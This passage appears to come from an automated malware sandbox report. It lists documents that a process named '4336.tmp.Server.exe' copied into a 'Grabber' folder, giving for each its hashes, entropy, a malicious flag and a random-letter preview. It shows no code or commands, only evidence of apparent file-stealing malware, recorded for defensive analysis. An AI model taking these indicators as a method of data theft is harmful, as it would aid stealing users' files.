Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	true
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	true
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	true
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
